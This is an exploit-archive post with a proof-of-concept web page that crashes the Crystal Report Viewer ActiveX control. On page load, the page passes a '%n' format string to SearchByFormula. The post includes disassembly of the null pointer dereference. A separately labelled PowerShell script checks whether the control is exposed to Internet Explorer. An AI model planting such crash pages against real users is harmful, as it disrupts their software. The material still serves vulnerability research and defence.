escalation666

[RST]Crystal Report Viewer null pointer dereference

<html>
<!--
found and coded by: escalation666
site: www.rstcenter.com
RIP moubik

Crystal Report Viewer Control crviewer.dll null pointer dereference
Exploitable: No
RegKey Safe for Script: True
RegKey Safe for Init: True

Disassembly:
600084AB PUSH ECX
600084AC PUSH ECX
600084AD PUSH ESI
600084AE PUSH EDI
600084AF MOV [EBP-10],ECX
600084B2 MOV EAX,[EBP+8]
600084B5 MOV ESI,[EAX+50] -> crash

where eax: 00000000
ebp: 00000000
ebp+8: 00000000

Poc:
-->
<object classid='clsid:C4847596-972C-11D0-9567-00A0C9273C2A' id='test'>
</object>
<head>
<script language='javascript'>
function exploit(){
var arg = "%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n";
test.SearchByFormula(arg);
}
</script></head>
<body onload="javascript: return exploit();">
</body>
</html>
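Added example, not part of the original post: a PowerShell check for the two registry markings the post reports (Safe for Script, Safe for Init) plus the Internet Explorer kill bit for the same CLSID, so an administrator can see whether the control is scriptable from a web page on a given host. The category GUIDs and the ActiveX Compatibility key are the standard Windows values, not taken from the post, and the function name is hypothetical.

```powershell
# Added example: report how Internet Explorer would treat one ActiveX CLSID.
$Clsid         = '{C4847596-972C-11D0-9567-00A0C9273C2A}'  # from the PoC above
$CatSafeScript = '{7DD95801-9882-11CF-9FA9-00AA006C496C}'  # CATID_SafeForScripting
$CatSafeInit   = '{7DD95802-9882-11CF-9FA9-00AA006C496C}'  # CATID_SafeForInitializing
$KillBit       = 0x400                                     # COMPAT_EVIL_DONT_LOAD

function Get-ActiveXExposure {   # hypothetical helper name
    param(
        [Parameter(Mandatory)] [string] $Clsid,
        [Parameter(Mandatory)] [string] $SoftwareRoot   # native or WOW6432Node view
    )
    $classKey  = "$SoftwareRoot\Classes\CLSID\$Clsid"
    $compatKey = "$SoftwareRoot\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    # Path of the DLL that implements the control, if it is registered at all.
    $server = $null
    if (Test-Path -LiteralPath "$classKey\InprocServer32") {
        $server = (Get-ItemProperty -LiteralPath "$classKey\InprocServer32").'(default)'
    }

    # Kill bit: IE refuses to instantiate the control when this flag is set.
    $flags = 0
    if (Test-Path -LiteralPath $compatKey) {
        $prop = Get-ItemProperty -LiteralPath $compatKey -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = $prop.'Compatibility Flags' }
    }

    $registered = Test-Path -LiteralPath $classKey
    $safeScript = Test-Path -LiteralPath "$classKey\Implemented Categories\$CatSafeScript"
    $safeInit   = Test-Path -LiteralPath "$classKey\Implemented Categories\$CatSafeInit"
    $killed     = ($flags -band $KillBit) -ne 0

    [pscustomobject]@{
        View             = $SoftwareRoot
        Registered       = $registered
        Server           = $server
        SafeForScripting = $safeScript
        SafeForInit      = $safeInit
        KillBitSet       = $killed
        # Marked safe for scripting in the registry and not blocked by a kill bit.
        # A control can also claim safety at run time through IObjectSafety,
        # which the registry does not show.
        ScriptableFromIE = $registered -and $safeScript -and -not $killed
    }
}

'HKLM:\SOFTWARE', 'HKLM:\SOFTWARE\WOW6432Node' |
    ForEach-Object { Get-ActiveXExposure -Clsid $Clsid -SoftwareRoot $_ } |
    Format-List
```

A host where `ScriptableFromIE` is `True` will load the control for any page that references the CLSID; setting the kill bit for that CLSID or removing the viewer control closes that path.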
